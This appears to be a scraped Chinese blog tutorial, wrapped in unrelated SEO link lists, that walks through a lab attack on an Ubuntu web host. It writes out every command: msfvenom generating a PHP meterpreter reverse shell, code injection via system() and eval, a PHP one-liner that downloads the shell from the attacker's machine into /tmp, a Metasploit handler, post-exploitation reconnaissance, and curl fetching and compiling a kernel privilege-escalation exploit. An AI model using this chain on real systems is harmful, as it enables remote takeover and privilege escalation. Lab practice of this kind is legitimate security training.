当前位置: 首页 > wzjs >正文

兰溪网站建设学徒百度经验手机版官网

wzjs 2025/8/21 20:35:13
兰溪网站建设学徒,百度经验手机版官网,青岛胶南做网站的,苏州企业网站建设首先metasploit是什么呢,该怎末使用呢 Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发&…

首先metasploit是什么呢,该怎末使用呢

Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代 码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。

下边这篇文章告诉哦你

【工具使用】——Metasploit(MSF)使用详解(超详细)-CSDN博客

然后我们呢开始实验

首先准备环境

我们的kail机 ip 192.168.25.138 (这个相信你们都有)

还有上一篇文章的 Ubuntu 主机 ip 192.168.25.135 (这个就是上一篇下载的那个 没有的 我再次放在下边)

通过网盘分享的文件:Ubuntu.zip

链接: 百度网盘 请输入提取码 提取码: 33g3

--来自百度网盘超级会员v3的分享

我们首先打开我们的kail机

输入 ifconfig

我们的ip是192.68.25.138

首先我们先要生成攻击载荷

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.25.138 LPORT=12345 -f raw >shell.php

不知道msfvenom 是啥的

msfvenom -p 模板 -e 编码模板 -i 编码次数 -b 避免字符集 LHOST(ifconfig查看) LPORT(监听端口) -f 输出文件类型 > 文件名

参考这一篇文章

msfvenom的使用&免杀&外网渗透_msfvalenem-CSDN博客

我就可以看到桌面上有了shell.php

我们来查看一下源代码

我们的目的 就是要把这个攻击载荷 下载到目标主机上

还是一样的

我们首先要开启80端口服务

python3 -m http.server 80

还是老样子

在我们的本机上windows上输入 192.168.25.135

然后打开eval函数 超链接

输入 system 函数

data=system('ls -al');

然后我们查看上一级目录

data=system('ls -al ../');

我们看到了tmp目录 那个临时目录 是谁都可以访问修改的

那我们就进入tmp目录 等下下载到这个目录里

data=system('ls -al ../tmp');

然后我们还是可以用一个反弹shell 然后输入指令 使用wegt或者curl进行下载

这里我们是php代码 咋们可以用php的一个函数来解决

file_get_contents 它可以本地请求 也可以远程http请求

想了解更多的 我们可以看下一篇文章

file_get_contents() 函数详解与使用_php file get contents-CSDN博客

file_get_contents('http://192.168.25.138/shell.php');

看不到内容 我们可以打印出来

echo file_get_contents('http://192.168.25.138/shell.php');

内容跟我们生成的攻击载荷一摸一样

下载我们就要开始写入文件了

file_put_contents函数

不懂得 可以看这一篇文章

php 读写文件 file_put_contents() 与 file_get_contents() 函数用法-CSDN博客

file_put_contents('../tmp/shell.php',file_get_contents('http://192.168.25.138/shell.php'));

现在让我们来查看Ubuntu主机上 有没有下载好没有这个shell.php文件

data=system('ls -al ../tmp');

然后接下来我们启动kail的msf(这里我就不在过多讲解 msf 相信你们都是业内人士)

msfconsole

然后使用监听模块

use exploit/multi/handler

然后设置payload

set payloadphp/meterpreter_reverse_tcp

输入

show options

查看要添加的参数名称

设置参数

set lhost 192.168.25.138 (kail的ip)

set lport 12345 (设置成为与攻击载荷相同的端口)

然后哦我们输入

run

开始监听

然后我们在我们的本机上输入 来访问shell.php

http://192.168.25.135/tmp/shell.php

然后返回kail 已经有了 meterpreter

大家这里不要管我这里的ip怎末变成了192.168.25.136 而不是192.168.25.135(我这里的ip变换了 大家不用管 就按照原来的走)

输入

getuid 查询当前用户

然后查看主机版本

sysinfo

然后我们进入shell

输入id

查询Ubuntu版本

cat /etc/issue

然后我们退出shell 到 meterpreter

exit

我们也可以使用 msf自带的后渗透模块来查询

run post/multi/recon/local_exploit_suggester

然后等待查询结束

这里没有查询到

然后还是一样的

在这个漏洞库查找

https://www.exploit-db.com/exploits/37292

还是上篇找到的 37292.c

虽然上次没有提权成功 因为这个漏洞不稳定

我们这次再试试

首先进入shell

python3 -c 'import pty;pty.spawn("/bin/bash")';

然后下载

curl http://192.168.25.138/37292.c -o /tmp/37292.c

然后进行编译

gcc 37292.c -o exp

输入

./exp

进行运行

这里还是没有成功 哎 太可惜了 很想给你们运行一遍

反正思路就是这个思路

大家可以找别的版本来运行一遍

http://www.dtcms.com/wzjs/433963.html

相关文章:

  • wordpress瀑布流网店百度seo泛解析代发排名
  • 西安定制网站建设湖南百度推广代理商
  • 聋哑工作设计做网站开封搜索引擎优化
  • 做网站推广托管费用电商平台开发需要多少钱
  • 网站建设服务流程贵州seo技术培训
  • 成都商城网站开发设计网站优化排名软件网站
  • 网站建设方案书doc模板怎么申请网站空间
  • 珠海疫情最新消息今天又封了seo排名软件
  • 事业单位备案网站北京网络营销推广外包
  • 如何做网站实名认证精准推广引流5000客源
  • 有哪些网站做的比较好看的黄冈地区免费网站推广平台
  • 橫山区建设局网站seo现在还有前景吗
  • 鲁 网站 备案西安百度推广运营公司
  • 聊城网站百度推广如何做好网络营销推广
  • 计算机编程网课无锡seo公司找哪家好
  • 虫虫管理wordpress软件西安网站关键词优化推荐
  • 代理公司代办网站优化技巧
  • 电商网站成本阿里云免费域名
  • 娱乐网站开发百度账号注册
  • 做网赌网站需要多少钱市场营销策划方案案例
  • 能免费建网站吗俄罗斯搜索引擎
  • 沈阳网站建设活动方案站长工具查询域名信息
  • 做网站 图片 文件夹 放哪儿网站查询信息
  • 什么语言做网站简单网络游戏推广员是做什么的
  • 网站空间 域名百度热搜榜在哪里看
  • 腾讯云网站备案不能用阿里云全国疫情突然又严重了
  • 淘宝代购网站开发网站开发建站
  • 从seo角度做网站流量网络广告营销的典型案例
  • 国外做机械设计任务的网站广州营销网站建设靠谱
  • 网站开发需要学shenme站优化